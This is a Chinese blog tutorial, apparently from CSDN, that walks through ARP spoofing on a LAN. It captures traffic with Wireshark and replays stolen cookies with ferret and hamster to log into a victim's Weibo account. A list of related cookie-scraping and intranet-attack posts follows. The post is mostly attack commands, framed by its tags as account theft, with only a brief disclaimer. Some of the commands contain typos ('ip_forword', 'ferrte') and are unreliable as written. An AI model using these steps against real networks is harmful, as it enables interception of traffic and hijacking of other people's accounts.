称霸内网之截取cookie实现微博登陆

最新推荐文章于 2025-07-02 11:40:23 发布
原创 最新推荐文章于 2025-07-02 11:40:23 发布 · 1.1k 阅读 · 8 ·
CC 4.0 BY-SA版权
学习之路长且漫,长情与君总会见!
文章标签:

#内网攻击 #截取cookie #称霸内网 #盗号登微博

本文介绍如何使用Kali Linux进行IP转发与ARP欺骗,通过Wireshark捕获网络流量并分析Cookie数据。涉及步骤包括配置网络环境、抓取微博登录过程中的数据包、下载并使用ferret工具处理捕获文件以及利用hamster命令进一步分析。

@ [toc]

【温馨提示】
(所有有关安全入侵防范知识仅供参考学习,未经他人允许侵入他人系统隐私是违法的!)

一、准备条件

--kali IP :192.168.43.18(虚拟机)
--受侵者IP :192.168.43.87(我的实体机)
			[两者确保能够ping通]

二、具体步骤

2.1 开启IP转发

》》echo "1" > /proc/sys/net/ipv4/ip_forword

2.2 开启arpspoof欺骗

》》arpspoof -i eth0 -t 192.168.43.1 192.168.43.87

这里写图片描述

2.3 在新的终端下打开wireshark开始抓包

这里写图片描述

2.4 登陆我的微博

这里写图片描述
这里写图片描述

2.5 停止wireshark保存文件

这里写图片描述
这里写图片描述
》》[此时关闭arpspoof欺骗]

2.6 对cookie分析

A.下载ferret

#加入源(可在Linux之kali更新源中查看)
#下载
》》dpkg --add-architecture i386 && apt-get update && apt-get install ferret-sidejack:i386

B.使用ferrte重新生成文件

》》ferrte -r cookie.pcap

C.利用hamster命令

》》hamster

D.打开浏览器设置本地IP代理和端口
这里写图片描述
这里写图片描述
这里写图片描述

三、测试

这里写图片描述
这里写图片描述

微博app-Cookie分析
Codeoooo 博客
06-20 1640
微博hook-cookies:(xposed):通过httpClient发送出去。
使用COOKIES
xunwu1150的博客
07-20 489
from selenium import webdriver import json,time url = 'https://www.arbmate.com/' driver = webdriver.Chrome() driver.get(url) # 使用COOKIES录 driver.delete_all_cookies() f1 = open('cookies.txt') cookie =...
微博图片爬取 & cookie获取方式
最新发布
m0_75015083的博客
07-02 266
在图中可以看到很多list,这些就是通过下滑页面不断刷新出来的。里面的内容在Response中,要看具体加载出来的图片可点击上面的img,里面可以查看图片的content-length。(如果加载不出来可以刷新页面)2 请求图片地址,进行下载(下载分两种方式,一直是直接放进内存然后整个下载,但是这种方式在文件很大的时候内存可能会溢出,所以可以用注释部分代码,快下载,这种方式可下载各种格式图片,包括动图)黄色部分就是所需要的cookie,但是cookie会定期刷新,有可能失效了,失效了重新获取一下就行。
获取新浪微博cookie
KING100549的博客
12-10 2822
之前也百度了一下如何获取新浪微博cookie,附上其中出现频率最高的教程的网址 https://www.douban.com/note/264976536/?start=0#32893498 自己按照上面的步骤试了一下,然后发现找不到weibo.com,然后就试了一下其他用移动端微博就可以 www.weibo.cn 首先也是用chrome浏览器打开,F12打开(我的键盘好像没有转换,...
微博cookie获取方法
weixin_43530433的博客
03-17 842
微博cookie获取
java微博 12 cookie
m0_60071324的博客
07-02 274
会话跟踪:一种维护浏览器状态的方法,服务器需要识别多次请求是否来自于同一浏览器,以便在同一次会话的多次请求间==共享数据==。为什么现在浏览器和服务器不支持数据共享呢?浏览器和服务器之间使用的是HTTP请求来进行数据传输HTTP协议是==无状态==的,每次浏览器向服务器请求时,服务器都会将该请求视为==新的==请求HTTP协议设计成无状态的目的是让每次请求之间相互独立,互不影响请求与请求之间独立后,就无法实现多次请求之间的数据共享会话跟踪实现方式有:(1)客户端会话跟踪技术:==Cookie==(2)服务端
kali攻防第3章 内网称霸Cookie截取
安全参透之旅
11-25 9871
内网称霸Cookie截取   准备工具   1、一台KALI_LINUX系统 2、一台被攻击的windows系统   网络环境   Kali系统IP  10.10.10.131 Windows xp IP 10.10.10.129   使用的工具   arpspoof   -->欺骗工具    wireshark -->抓包工具       开始执行步骤
内网称霸之《HTTPS账号密码获取》
Alvin的博客
02-27 3515
⭐使用工具:arpspoof、ettercap、sslstrip 一、将HTTPS转换成HTTP 在获取HTTPS账号、密码的操作前需要修改ettercap的设置,否则无法成功。 1.先编辑/etc/ettercap/etter.conf下的文件内容,更改ettercap设置; 1.1输入/etc/ettercap/etter.conf后找到: # if you use iptables: #r...
石油化工行业:大炼化产业系列报告之PTA篇:景气周期来临,行业龙头开启称霸全球之旅.pdf
08-22
石油化工行业:大炼化产业系列报告之PTA篇:景气周期来临,行业龙头开启称霸全球之旅.pdf
管理软件产业专题研究报告-Salesforce的企服称霸之路(1).docx
06-20
管理软件产业专题研究报告-Salesforce的企服称霸之路(1).docx
新浪微博通过账户和密码获取cookie
07-08
新浪微博通过账户和密码获取cookie
微博cookie的获取和使用
热门推荐
wojiucaonen的博客
06-17 1万+
首先是pc版网页cookie的获取: from selenium import webdriver import time from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.w...
爬虫-微博Cookie
m0_74462339的博客
09-16 4503
在爬虫中,使用通常用于访问需要身份验证的网页或保存用户会话状态的网站。Cookie 是服务器存储在客户端(浏览器)上的一小段数据,主要用于跟踪用户的会话信息。例如,当用户录一个网站时,服务器会将用户的身份信息(如会话ID)存储在 Cookie 中,以便在后续的请求中确认用户的身份。一些网站对未录的用户有内容访问限制,只有录后才能获取特定内容。通过使用录后的 Cookie,你的爬虫可以模拟已录的用户,从而访问网站的更多资源。2.
利用cookie劫持微博私信
weixin_33796205的博客
02-28 248
记得还是在学Qt编程的时候,做过一个练手项目,产品是一个搜索Chrome的cookie内容的小软件。Chrome的cookie保存在用户目录的一个sqlite文件中,具体路径上网搜一下就知道了。当时比较天真,想看看cookie里面有没有明文保存的密码,结果当然是得到一堆乱码,最后就不了了之了。 直到前几天,我正在网上看一篇关于cookie...
最新获取微博cookie,爬虫
qq_36652557的博客
12-29 2458
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、使用步骤1.引入库及代码总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、使用步骤 1.引入库及代码 代码如下(示例): import requests import json headers = { "User-Agent": "Mozill
爬虫笔记-cookie微博
qq_54152856的博客
02-22 1609
# 适用的场景:数据采集的时候 需要绕过录 然后进入某个页面 # 个人信息页面时utf-8 但是还报错了编码错误 因为并没有进入个人信息页面 而是跳转到了录页面 # 录页面不是utf-8 所以报错 # 什么情况下 访问不成功 # 因为请求头的信息不够 所以访问不成功 import urllib.request url = 'https://weibo.com/u/7520422345' headers = { # cookie中携带着你的录信息 如果录之后的cooki..
新浪微博批量录获取cookie
L_huiger的博客
11-19 3422
新浪微博录批量获取cookie 目的 微博的很多数据在查看的时候是需要用户录之后才可以的,比如web端的微博关键词搜索翻页,不录的情况下只能查看第一页,而当请求头中携带录后的cookie时,可以获得翻页后的数据。 预录地址:http://my.sina.com.cn/profile/unlogin 在用户输入用户名时会将用户名通过加密,通过地址(https://login.sina.com.cn/sso/prelogin.php?entry=account&callback=si
微博采集所用到的几种cookie总结
wang785994599的博客
05-31 2857
微博cookie的分类用户登陆cookie游客cookie登陆后访问敏感微博所产生的cookie更多的待发现 用户登陆cookiecookie微博网页版登陆所产上的cookie,可用于几乎所有的微博内容,微博评论采集,但是无法访问部分微博内容的接口(即未录状态下显示404的微博)。 游客cookiecookie为未登陆状态下访问微博所需要的cookie,可用于几乎所有的微博内容,微博评...
四大主流手机操作系统解析:诺基亚Symbian称霸
由于诺基亚是Symbian公司的主要股东之一,SymbianOS在诺基亚手机中得到了广泛应用。Symbian提供了多个用户界面,如Series 60、Series 80、Series 90和UIQ,满足不同用户需求。Series 60是最常见的,支持大量第三方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值